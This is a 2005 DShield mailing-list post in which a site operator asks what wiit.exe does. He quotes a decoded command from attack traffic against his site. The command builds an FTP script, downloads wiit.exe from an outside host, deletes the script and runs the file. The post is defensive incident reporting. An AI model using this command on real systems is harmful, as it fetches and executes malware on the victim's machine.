[Dshield] Anyone seen wiit.exe?

bgreenwood forum at dshield.org
Mon Aug 29 20:20:56 GMT 2005

Over about the past two weeks or so I have noticed the following being base64 encoded in the URI of some incoming requests to my site...

cmd /k echo open 17113 > o&echo user 1 1 >> o &echo get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe

I have seen this activity before but with different filenames being called out.  I don't recall seeing the wiit.exe or know exactly what it is supposed to be doing. Has anyone seen this or know what it is supposed to be doing once executed? 
This message was sent via the web forum at

More information about the list mailing list